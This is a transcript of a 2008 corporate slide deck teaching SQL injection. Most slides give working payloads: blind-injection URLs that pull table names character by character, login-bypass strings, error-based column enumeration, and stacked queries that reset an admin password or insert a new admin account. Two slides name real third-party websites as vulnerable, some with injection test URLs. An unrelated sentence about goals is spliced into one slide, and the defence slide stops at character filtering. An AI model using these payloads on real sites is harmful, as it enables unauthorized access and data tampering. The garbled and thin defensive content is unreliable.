20628302 sql injections
TRANSCRIPT
SQL Injections
Core QA Team5th March 2008
2©Copyright Kenexa® 2004
Agenda
What is SQL Injection SQL Injection possibilities Technologies affected by SQL Injections Types of SQL Injections Techniques in SQL Injections How to use Blind SQL Injections How to use SQL Injections How to use Advanced SQL Injections How update data in the Database How to avoid SQL Injections Next generation of Hacking Tools for SQL Injections
3©Copyright Kenexa® 2004
What is SQL Injection
• SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most
common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database.
• In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.
4©Copyright Kenexa® 2004
SQL Injection possibilities
• Using SQL injections, attackers can:– Add new data to the database
• Could be embarrassing to find yourself selling politically incorrect items on an eCommerce site
• Perform an INSERT in the injected SQL– Modify data currently in the database
• Could be very costly to have an expensive item suddenly be deeply ‘discounted’
• Perform an UPDATE in the injected SQL– Often can gain access to other user’s system capabilities by obtaining
their password
5©Copyright Kenexa® 2004
Technologies affected by SQL Injections
• JSPASPXML • XSL JavascriptVB• MFC and other ODBC-based tools • APIs3- and 4GL-based languages such as C, OCI, Pro*C, and COBOL Perl • CGI scripts that access Oracle databases many more
6©Copyright Kenexa® 2004
Types of SQL Injections
• Blind SQL injections• SQL injections• Advanced SQL injects
7©Copyright Kenexa® 2004
Techniques in SQL Injections
• Authorization bypass • Using the SELECT command • Using the INSERT command • Using SQL server stored procedures
8©Copyright Kenexa® 2004
How to use Blind SQL injection
Step1- For instance, many companies allow Internet access to archives of their press releases. A URL for accessing the company’s fifth press release might look like this: http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5
Step2-For example, if you request this URL http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5
AND 1=1 if this query also returns the same press release, then the
application is susceptible to SQL injection
Step-3 . We can use this behavior to “ask” the database server true/false questions. For instance, the following request essentially asks the database server, “Is the current user john?” http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND USER_NAME() = ‘john’
9©Copyright Kenexa® 2004
How to use Blind SQL injection
USER_NAME() is a SQL Server function that returns the name of the current user. If the current user is dbo (administrator), the fifth press release will be returned. If not, the query will fail and no press release will be displayed
Step4 - By combining sub queries and functions, we can ask more complex questions. The following example attempts to retrieve the name of a database table, one character at a time.
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 109
Step5 - If the server returns the fifth press release in response to this URL, we know that the first letter of the query’s result comes after the letter “m” (ASCII character 109) in the alphabet. By making multiple requests, we can determine the precise ASCII value.
10©Copyright Kenexa® 2004
How to use Blind SQL injection
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
• Step 6 - If no press release is returned, the ASCII value is greater than 109 but not greater than 116. So, the letter is between “n” (110) and “t” (116).
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 113
11©Copyright Kenexa® 2004
URL’s venerable to Blind SQL Injections attack
http://www.bharatstudent.com/cafebharat/cafebharat.php?cat=2%20and%201=1
http://content-ind.cricinfo.com/wivzimsa/engine/current/match/298809.html%20and%201=1
http://www.minglebox.com/user.do?method=registerUser&error=true%20and%20USERINFO_NAME="raj“
12©Copyright Kenexa® 2004
How to use SQL injections
13©Copyright Kenexa® 2004
How to use SQL injections
• Here is a sample basic HTML form with two inputs, login and password.
<form method="post"
action="http://testasp.acunetix.com/login.asp"> <input name="tfUName" type="text" id="tfUName"> <input name="tfUPass" type="password" id="tfUPass"> </form>
• The easiest way for the login.asp to work is by building a database query that looks like this:
SELECT idFROM loginsWHERE username = '$username'AND password = '$password’
14©Copyright Kenexa® 2004
How to use SQL injections
• If the variables $username and $password are requested directly from the user's input, this can easily be compromised. Suppose that we gave "Joe" as a username and that the following string was provided as a password: anything' OR 'x'='x’
SELECT id
FROM loginsWHERE username = 'Joe'AND password = 'anything' OR 'x'='x' Make sure that your short term goals will help to achieve the Medium term goals and vice versa.
15©Copyright Kenexa® 2004
How to use SQL injections
• As the inputs of the web application are not properly sanitised, the use of the single quotes has turned the WHERE SQL command into a two-component clause.
• The 'x'='x' part guarantees to be true regardless of what the first part contains.
• This will allow the attacker to bypass the login form without actually knowing a valid username / password combination!
• Depending on the actual SQL query, you may have to try some of these possibilities:' or 1=1--or 1=1--or 1=1--' or 'a'='a" or "a"="a
') or ('a'='a
16©Copyright Kenexa® 2004
URL’s venerable to Blind SQL Injections attack http://www.osmania.ac.in/ou/res07/20080126.jsp
http://www.powerscrap.com/frame.aspx?Login=true
17©Copyright Kenexa® 2004
How to use Advanced SQL injects
• The attacker could log in as the first user in the 'users' table, with the following input:
Username: ' or 1=1-- • The attacker wants to establish the names of the tables that the
query operates on, and the names of the fields. To do this, the attacker uses the 'having' clause of the 'select' statement:
Username: ' having 1=1– • So the attacker now knows the table name and column name of the
first column in the query. They can continue through the columns by introducing each field into a 'group by' clause, as follows:
Username: ' group by users.id having 1=1--
18©Copyright Kenexa® 2004
How to use Advanced SQL injects
• (which produces the error…) Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/process_login.asp, line 35
• Eventually the attacker arrives at the following 'username': ' group by users.id, users.username, users.password, users.privs
having 1=1– • … which produces no error, and is functionally equivalent to: select * from users where username = ''
• It would be useful if he could determine the types of each column. This can be achieved using a 'type conversion' error message, like this:
Username: ' union select sum(username) from users--
19©Copyright Kenexa® 2004
How update data in the Database
• When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".
20©Copyright Kenexa® 2004
How to avoid SQL Injections
• Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from: - Input from users - Parameters from URL - Values from cookie
For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
21©Copyright Kenexa® 2004
Next generation of Hacking
• Ethical Hacking• Server side scripting• Client side scripting• Bluetooth Hacking• Console Hacking
22©Copyright Kenexa® 2004
Tools for SQL Injection
• SQID – Sequel Injection Digger• SQLBrute - SQL Injection Brute Force Tool • N-Stalker Web Application Security Scanner 2006• Acunetix Web Vulnerable Scanner• HP Web Inspect• Wikto: Web Server Assessment Tool
23©Copyright Kenexa® 2004
References
http://www.unixwiz.net/techtips/sql-injection.html
http://www.imperva.com/resources/glossary/sql_injection.html
http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
http://www.security-hacks.com/2007/05/18/top-15-free-sql-injection-scanners
24©Copyright Kenexa® 2004
www.kenexa.com